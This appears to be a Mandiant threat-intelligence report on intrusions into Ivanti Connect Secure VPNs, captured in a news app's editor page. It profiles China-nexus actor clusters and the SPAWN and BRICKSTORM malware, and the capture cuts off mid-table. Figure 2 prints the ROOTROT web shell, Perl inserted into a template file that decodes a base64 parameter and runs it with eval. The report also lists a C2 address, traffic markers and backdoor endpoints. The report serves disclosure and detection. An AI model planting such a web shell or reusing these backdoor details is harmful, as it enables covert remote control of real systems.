♊️ GemiNews 🗞️
(dev)
🏡
📰 Articles
🏷️ Tags
🧠 Queries
📈 Graphs
☁️ Stats
💁🏻 Assistant
💬
🎙️
Demo 1: Embeddings + Recommendation
Demo 2: Bella RAGa
Demo 3: NewRetriever
Demo 4: Assistant function calling
Editing article
Title
Summary
<div class="block-paragraph_advanced"><p>Written by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan</p> <hr/> <p> </p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Since the </span><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">initial disclosure</span></a><span style="vertical-align: baseline;"> of </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2023-46805</span></a><span style="vertical-align: baseline;"> and </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2024-21887</span></a><span style="vertical-align: baseline;"> on Jan. 10, 2024, Mandiant has conducted multiple incident response engagements across a range of industry verticals and geographic regions. Mandiant's previous blog post, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence"><span style="text-decoration: underline; vertical-align: baseline;">Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts</span></a><span style="vertical-align: baseline;">, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus espionage actor that Mandiant tracks as UNC5325. </span></p> <p><span style="vertical-align: baseline;">This blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types of activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did not have the appropriate mitigation applied. </span></p> <p><span style="vertical-align: baseline;">Mandiant has observed different types of post-exploitation activity across our incident response engagements, including lateral movement supported by the deployment of open-source tooling and custom malware families. In addition, we've seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by abusing appliance-specific functionality to achieve their objectives.</span></p> <p><span style="vertical-align: baseline;">As of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by the vulnerabilities. We recommend that customers follow Ivanti's latest </span><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">patching guidance</span></a><span style="vertical-align: baseline;"> and instructions to prevent further exploitation activity. In addition, Ivanti released a </span><a href="https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-policy-secure" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">new enhanced external integrity checker tool</span></a><span style="vertical-align: baseline;"> (ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other tactics, techniques, and procedures (TTPs) observed in the wild. We also released a </span><a href="https://services.google.com/fh/files/misc/ivanti-connect-secure-remediation-hardening.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">remediation and hardening guide</span></a><span style="vertical-align: baseline;">, which includes recommendations.</span></p> <p><span style="vertical-align: baseline;">Mandiant recommends customers run both the internal and the latest </span><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">external ICT</span></a><span style="vertical-align: baseline;"> released alongside a </span><a href="https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-policy-secure" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">new patch</span></a><span style="vertical-align: baseline;"> on April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge Ivanti for their collaboration, transparency, and ongoing support throughout this process.</span></p> <h2><span style="vertical-align: baseline;">Clustering and Attribution</span></h2> <p><span style="vertical-align: baseline;">Mandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893 across our incident response investigations.</span><span style="vertical-align: baseline;"> In addition to suspected China-nexus espionage groups, Mandiant has also identified financially motivated actors exploiting </span><span style="vertical-align: baseline;">CVE-2023-46805 and CVE-2024-21887</span><span style="vertical-align: baseline;">, likely to enable operations such as crypto-mining. </span><span style="vertical-align: baseline;">Since the public disclosure on Jan. 10, 2024, Mandiant has observed eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are highlighting five China-nexus clusters that have conducted intrusions. </span></p> <p><span style="vertical-align: baseline;">In February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium confidence to be Volt Typhoon, targeting U.S. energy and defense sectors. The UNC5291 campaign targeted Citrix Netscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024, however Mandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure.</span></p> <h3><span style="vertical-align: baseline;">UNC5221</span></h3> <p><a href="https://advantage.mandiant.com/actors/threat-actor--b797832d-0411-5574-b7cf-c51b22e08423" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">UNC5221</span></a><span style="vertical-align: baseline;"> is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-46805 and CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation"><span style="text-decoration: underline; vertical-align: baseline;">previous blog post</span></a><span style="vertical-align: baseline;">, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887 following the public disclosure on Jan. 10, 2024.</span></p> <h3><span style="vertical-align: baseline;">UNC5266</span></h3> <p><span style="vertical-align: baseline;">Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments. </span></p> <h3><span style="vertical-align: baseline;">UNC5330</span></h3> <p><span style="vertical-align: baseline;">UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence.</span></p> <p><span style="vertical-align: baseline;">Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021. </span></p> <h3><span style="vertical-align: baseline;">UNC5337</span></h3> <p><span style="vertical-align: baseline;">UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221. </span></p> <h3><span style="vertical-align: baseline;">UNC5291</span></h3> <p><span style="vertical-align: baseline;">UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that </span><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Volt Typhoon was targeting critical infrastructure</span></a><span style="vertical-align: baseline;"> and was potentially interested in Ivanti Connect Secure devices for initial access.</span></p> <h2><span style="vertical-align: baseline;">New TTPs and Malware</span></h2> <p><span style="vertical-align: baseline;">Since our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain access to target environments and move laterally within them. Additionally, Mandiant has identified several new code families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these code families, several are assessed to be custom malware families; however, Mandiant has also identified the use of open-source tooling, such as SLIVER and CrackMapExec.</span></p> <h3><span style="vertical-align: baseline;">SPAWN Malware Family</span></h3> <p><span style="vertical-align: baseline;">During analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four distinct malware families that work closely together to create a stealthy and persistent backdoor on an infected appliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid detection. </span></p> <p><span style="vertical-align: baseline;">Figure 1 illustrates how the SPAWN malware family operates.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/cutting-edge4-fig1.max-1000x1000.png" alt="SPAWN malware family diagram"> </a> <figcaption class="article-image__caption "><p data-block-key="hrsqd">Figure 1: SPAWN malware family diagram</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">SPAWNANT</span></h4> <p><span style="vertical-align: baseline;">SPAWNANT</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">is an installer that leverages a coreboot installer function to establish persistence for the SPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate </span><code style="vertical-align: baseline;">dspkginstall</code><span style="vertical-align: baseline;"> installer process and exports an </span><code style="vertical-align: baseline;">sprintf</code><span style="vertical-align: baseline;"> function adding a malicious code to it before redirecting a flow back to </span><code style="vertical-align: baseline;">vsnprintf</code><span style="vertical-align: baseline;">.</span></p> <h4><span style="vertical-align: baseline;">SPAWNMOLE</span></h4> <p><span style="vertical-align: baseline;">SPAWNMOLE is a tunneler that injects into the </span><code style="vertical-align: baseline;">web</code><span style="vertical-align: baseline;"> process. It hijacks the </span><code style="vertical-align: baseline;">accept</code><span style="vertical-align: baseline;"> function in the </span><code style="vertical-align: baseline;">web</code><span style="vertical-align: baseline;"> process to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where SPAWNSNAIL is operating to access the backdoor.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The malware attempts to inject itself into a process named </span><code style="vertical-align: baseline;">web</code><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The malware attempts to hijack the </span><code style="vertical-align: baseline;">accept</code><span style="vertical-align: baseline;"> API from the </span><code style="vertical-align: baseline;">libc</code><span style="vertical-align: baseline;"> binary within </span><code style="vertical-align: baseline;">web</code><span style="vertical-align: baseline;"> process.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The malware traffic must start with a header that contains </span><span style="vertical-align: baseline;">0xfb49e3e2</span><span style="vertical-align: baseline;"> at offset </span><span style="vertical-align: baseline;">0x13</span><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">0x1bc38361</code><span style="vertical-align: baseline;"> at offset </span><code style="vertical-align: baseline;">0x1b</code><span style="vertical-align: baseline;"> of the received buffer.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">SPAWNSNAIL</span></h4> <p><span style="vertical-align: baseline;">SPAWNSNAIL (</span><code style="vertical-align: baseline;">libdsmeeting.so</code><span style="vertical-align: baseline;">) is a backdoor that listens on localhost. It is designed to run by injecting into the </span><code style="vertical-align: baseline;">dsmdm</code><span style="vertical-align: baseline;"> process (process responsible for supporting mobile device management features). It creates a backdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the SPAWNMOLE tunneler to interact with SPAWNSNAIL.</span></p> <p><span style="vertical-align: baseline;">SPAWNSNAIL's second purpose is to inject SPAWNSLOTH (</span><code style="vertical-align: baseline;">.liblogblock.so</code><span style="vertical-align: baseline;">) into </span><code style="vertical-align: baseline;">dslogserver</code><span style="vertical-align: baseline;">, a process supporting event logging on Connect Secure.</span></p> <p><span style="vertical-align: baseline;">SPAWNSNAIL checks if its binary name is </span><code style="vertical-align: baseline;">dsmdm</code><span style="vertical-align: baseline;">; if it is running under that name, it creates two threads:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">First thread drops a hard-coded SSH host private key to </span><code style="vertical-align: baseline;">/tmp/.dskey</code><span style="vertical-align: baseline;">, configures </span><code style="vertical-align: baseline;">libssh</code><span style="vertical-align: baseline;"> to use the key, and then deletes </span><code style="vertical-align: baseline;">/tmp/.dskey</code><span style="vertical-align: baseline;">. The malware binds to localhost on port 8300.</span></p> </li> <ol> <li aria-level="2" style="list-style-type: lower-alpha; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The SSH server requires public key authentication.</span></p> </li> <li aria-level="2" style="list-style-type: lower-alpha; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">When starting an interactive shell session, the malware prints a banner with statistics about the system. It will print the information about the release, uptime, current time, and whether SELinux is enabled. SPAWNSNAIL then executes an interactive </span><code style="vertical-align: baseline;">bash</code><span style="vertical-align: baseline;"> shell.</span></p> </li> </ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The second thread injects a log tampering utility, SPAWNSLOTH (</span><code style="vertical-align: baseline;">/tmp/.liblogblock.so</code><span style="vertical-align: baseline;">), into the </span><code style="vertical-align: baseline;">dslogserver</code><span style="vertical-align: baseline;"> process up to three times.</span></p> </li> </ol> <h4><span style="vertical-align: baseline;">SPAWNSLOTH</span></h4> <p><span style="vertical-align: baseline;">SPAWNSLOTH is a log tampering utility injected into the </span><code style="vertical-align: baseline;">dslogserver</code><span style="vertical-align: baseline;"> process. It can disable logging and disable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating.</span></p> <p><span style="vertical-align: baseline;">SPAWNSLOTH uses </span><a href="https://github.com/kubo/funchook" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">funchook</span></a><span style="vertical-align: baseline;"> to hook the </span><code style="vertical-align: baseline;">_ZN5DSLog4File3addEPKci</code><span style="vertical-align: baseline;"> function (it is assumed to be a logging function of </span><code style="vertical-align: baseline;">dslogserver</code><span style="vertical-align: baseline;">). It also modifies the </span><code style="vertical-align: baseline;">g_do_syslog_servers_exist_p</code><span style="vertical-align: baseline;"> symbol. This is a pointer to a global variable controlling if event logs should be forwarded to an external syslog server.</span></p> <p><span style="vertical-align: baseline;">Finally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL backdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running.</span></p> <h3><span style="vertical-align: baseline;">Getting to the Root of It</span></h3> <p><span style="vertical-align: baseline;">During the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a new web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a legitimate Connect Secure </span><code style="vertical-align: baseline;">.ttc</code><span style="vertical-align: baseline;"> file located at </span><code style="vertical-align: baseline;">/data/runtime/tmp/tt/setcookie.thtml.ttc</code><span style="vertical-align: baseline;"> by exploiting CVE-2023-46805 and CVE-2024-21887. </span><code style="vertical-align: baseline;">setcookie.thtml.ttc</code><span style="vertical-align: baseline;"> is located on a writable partition on the appliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11539" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2019-11539</span></a><span style="vertical-align: baseline;"> and </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8218" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2020-8218</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Figure 2 shows the code inserted into the </span><code style="vertical-align: baseline;">setcookie.thmtl.ttc</code><span style="vertical-align: baseline;"> file that contains ROOTROT. The web shell can be accessed at </span><code style="vertical-align: baseline;">/dana-na/auth/setcookie.cgi</code><span style="vertical-align: baseline;">. It parses the issued decoded Base64-encoded command and executes it with </span><code style="vertical-align: baseline;">eval</code><span style="vertical-align: baseline;">. </span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code> $output .= "</body>\n\n</html>\n"; $output .= "<!--\n"; my $key = CGI::param('[REDACTED]'); use MIME::Base64; if(defined($key)){ my $arg=decode_base64("$key"); eval($arg); } $output .= "-->\n"; } }; if ($@) { $error = $context->catch($@, \$output); die $error unless $error->type eq 'return'; } return $output; },</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 2: Code block inserted into the <code>setcookie.thtml.ttc</code> file</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">During the investigation, Mandiant identified that the web shell was created on the system prior to the public disclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the presence of ROOTROT by the existence of </span><code style="vertical-align: baseline;"><!--\n and -->\n</code><span style="vertical-align: baseline;"> at the end of the response from /</span><code style="vertical-align: baseline;">dana-na/auth/setcookie.cgi</code><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">As of April 3, 2024, <span style="vertical-align: baseline;">the latest external ICT will detect modifications to </span><code style="vertical-align: baseline;">setcookie.thtml.ttc</code></span>.</span></p> <h3><span style="vertical-align: baseline;">Lateral Movement Leading to vCenter Compromise</span></h3> <p><span style="vertical-align: baseline;">Once UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated network reconnaissance against the victim's network and moved laterally to a VMware vCenter server. Mandiant identified that UNC5221 first moved laterally using the vCenter web console, then later using SSH. </span></p> <p><span style="vertical-align: baseline;">After moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter, utilizing a naming convention consistent with other servers in the environment. Though the virtual machine creation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual machine.</span></p> <p><span style="vertical-align: baseline;">Following this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM backdoor to the appliance (</span><code style="vertical-align: baseline;">/home/vsphere-ui/vcli</code><code style="vertical-align: baseline;">)</code><span style="vertical-align: baseline;">. Notably, BRICKSTORM appears to masquerade as a legitimate vCenter process, </span><code style="vertical-align: baseline;">vami-http</code><span style="vertical-align: baseline;">. </span></p> <h4><span style="vertical-align: baseline;">BRICKSTORM</span></h4> <p><span style="vertical-align: baseline;">BRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded C2.</span></p> <p><span style="vertical-align: baseline;">Upon execution, BRICKSTORM checks for an environment variable, </span><code style="vertical-align: baseline;">WRITE_LOG</code><span style="vertical-align: baseline;">, to determine if the file needs to be executed as a child proce</span><span style="vertical-align: baseline;">ss.</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">If th</span><span style="vertical-align: baseline;">e variable returns false or is unset, it will copy the BRICKSTORM sample from </span><code style="vertical-align: baseline;">/home/vsphere-ui/vcli </code><span style="vertical-align: baseline;">to</span><code style="vertical-align: baseline;"> /opt/vmware/sbin </code><span style="vertical-align: baseline;">as </span><code style="vertical-align: baseline;">vami-httpd</code><span style="vertical-align: baseline;">. It will then execute the copied BRICKSTORM sample and terminate execution.</span></p> <p><span style="vertical-align: baseline;"> If </span><code style="vertical-align: baseline;">WRITE_LOG</code><span style="vertical-align: baseline;"> is set to tru</span><span style="vertical-align: baseline;">e,</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">it assumes </span><span style="vertical-align: baseline;">it is running as the correct process, deletes </span><code style="vertical-align: baseline;">/opt/vmware/sbin/vami-httpd</code><span style="vertical-align: baseline;">, and continues execution.</span></p> <p><span style="vertical-align: baseline;">BRICKSTORM contains a separate function called </span><code style="vertical-align: baseline;">Watcher,</code><span style="vertical-align: baseline;"> which contains self-monitoring functionality. If the environment variable </span><code style="vertical-align: baseline;">WORKER</code><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">returns false or is unset, it will continue the monitoring, checking for the file </span><code style="vertical-align: baseline;">/home/vsphere-ui/vcli</code><span style="vertical-align: baseline;"> and copying the contents over to </span><code style="vertical-align: baseline;">/opt/vmware/sbin/vami-httpd</code><span style="vertical-align: baseline;">. Then, it sets the appropriate environment variables and spawns the proc</span><span style="vertical-align: baseline;">es</span><span style="vertical-align: baseline;">s. The watcher process then begins monitoring the exit status of the child process.</span></p> <p><span style="vertical-align: baseline;">If it finds the environment variable </span><code style="vertical-align: baseline;">WORKER</code><span style="vertical-align: baseline;"> is set to </span><code style="vertical-align: baseline;">true</code><span style="vertical-align: baseline;">, it assumes it is a spawned worker process meant to execute the backdoor functionality and skips the remainder of the </span><code style="vertical-align: baseline;">Watcher</code><span style="vertical-align: baseline;"> function.</span></p> <p><span style="vertical-align: baseline;">BRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket address of </span><code style="vertical-align: baseline;">wss://opra1.oprawh.workers[.]dev</code><span style="vertical-align: baseline;">. Additionally, it contains the following legitimate DNS over HTTPS (DoH) addresses.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>https://9.9.9.9/dns-query https://45.90.28.160/dns-query https://45.90.30.160/dns-query https://149.112.112.112/dns-query https://9.9.9.11/dns-query https://1.1.1.1/dns-query https://1.0.0.1/dns-query https://8.8.8.8/dns-query https://8.8.4.4/dns-query</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 3: DNS over HTTPS addresses</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">BRICKSTORM appears to leverage a custom Go package called </span><code style="vertical-align: baseline;">wssoft</code><span style="vertical-align: baseline;">. There is no known, publicly available Go package with this name. It appears this may be the main package developed by the malware authors to perform task processing and connection handling for the malware.</span></p> <p><span style="vertical-align: baseline;">Table 1 provides the four core functions provided by </span><code style="vertical-align: baseline;">wssoft</code><span style="vertical-align: baseline;">.<br/><br/></span></p> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Function</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Comments</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Spawning a web server</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">See below for accepted routes/endpoints</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Command execution</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Executes shell commands using </span><code style="vertical-align: baseline;">/bin/sh</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Command execution (“NoContext”)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Executes shell commands using calls to os. </span><code style="vertical-align: baseline;">Exec</code></p> <p><span style="vertical-align: baseline;">likely accepts commands </span><code style="vertical-align: baseline;">run_shell</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">exit</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SOCKS relaying</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Connection proxying</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 1: </span><code style="vertical-align: baseline;">wssoft</code><span style="vertical-align: baseline;"> capabilities</span></span></p> <p><span style="vertical-align: baseline;">When the backdoor functionality is activated, it spawns a web server to handle incoming commands. It uses </span><a href="https://github.com/gorilla/mux" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Gorilla/mux</span></a><span style="vertical-align: baseline;"> to handle the endpoint routing and </span><a href="https://github.com/lonng/nex" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">lonnng/nex</span></a><span style="vertical-align: baseline;"> to marshal the data into JSON.</span></p> <p><span style="vertical-align: baseline;">Table 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests.<br/><br/></span></p> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Endpoint</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Function</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/change-dir</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Change directory</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/delete-dir</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Deletes a directory</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/delete-file</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Deletes a file</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/mkdir</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Makes a directory (create subdirectories as necessary)</span></p> </td> </tr> <tr> <td 